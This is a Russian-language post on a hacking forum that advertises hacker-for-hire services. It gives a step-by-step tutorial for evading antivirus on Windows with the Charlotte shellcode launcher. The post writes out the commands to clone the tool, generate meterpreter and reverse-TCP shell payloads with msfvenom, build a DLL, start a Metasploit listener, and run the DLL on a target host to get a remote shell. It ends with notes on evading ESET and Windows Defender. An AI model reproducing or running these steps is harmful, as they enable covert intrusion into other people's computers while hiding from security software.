Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Приветствую, хакеры! В этой статье разберем метод создания FUD шеллкода под Windows платформу.

Для начала, немного теории: 

Для того, чтобы достичь максимального профита в данном вопросе и в данном конкретном случае мы будем использовать:

Charlotte - C++ Fully Undetected Shellcode Launcher

Описание: 

  • Средство запуска шелл-кода c ++, полностью необнаруженное 0/26 по состоянию на 13 мая 2021 г.
  • Динамический вызов функций api win32
  • XOR-шифрование шелл-кода и имен функций
  • Рандомизированные ключи XOR и переменные за запуск
  • Требования для Kali Linux просто «apt-get install mingw-w64 *»
  • Рандомизация длины случайных строк и ключей XOR

Приступаем к реализации задуманного:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

cd charlotte

sFPCAq7W68A.jpg?size=807x213&quality=96&

 

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

MzGPozTtLTc.jpg?size=807x165&quality=96&

 

python charlotte.py

8771uNsFCiM.jpg?size=807x601&quality=96&

 

Такой вывод, должен вас ждать в случае успешного создания dll файла для запуска его на целевом хосте.

rundll32 charlotte.dll, STmdDoaQ

6WxcjP87keQ.jpg?size=807x248&quality=96&

 

STmdDoaQ -В данном случае выступает ключом, с которым мы позже запустим dll на целевом хосте.

Запускаем обработчик входящих подключений на атакующем хосте:

msfconsole

use exploit/multi/handler

set LHOST {IP}

set LPORT {port}

0T3Kvl4ivRo.jpg?size=807x202&quality=96&

 

Доставляем файл charlotte.dll на целевой хост, и выполняем:

rundll32 charlotte.dll, STmdDoaQ

EMshmoOF0Ho.jpg?size=719x239&quality=96&

 

В результате, закономерно получаем шелл на целевом хосте:

2WpV8CnHIHs.jpg?size=807x229&quality=96&

 

В целом, всё выглядит неплохо, но если на борту у целевого хоста стоит антивирус, нормальный с последними обновлениями то мы получаем срабатывание на meterpreter, так как он не палится только ленивыми.

Попробуем немного видоизменить полезную нагрузку:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.101 LPORT=4444 -f raw > beacon.bin

o_Kx7uLocfM.jpg?size=807x123&quality=96&

 

Запускаем обработчик:

UM_VkZMA17w.jpg?size=807x219&quality=96&

 

Данный тест проводился на Windows 10 с последними обновлениями и наличием антивирусного решения ESET, и как результат, ESET убил полезную нагрузку.

h6ojR4c88wU.jpg?size=807x435&quality=96&

 

Вывод: 

  • Метод и инструмент достаточно хорош, dll файл не распознается как вредоносный ни антивирусом ни Windows Defender
  • Использование стандартных полезных нагрузок не сработает, в случае наличия вменяемого антивирусного решения на целевом хосте
  • Нужно использовать отличные от предлагаемых стандартных методов сокрытия полезной нагрузки для достижения желаемого результата.​​

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,256
    Total Members
    30,834
    Most Online
    саня328
    Newest Member
    саня328
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.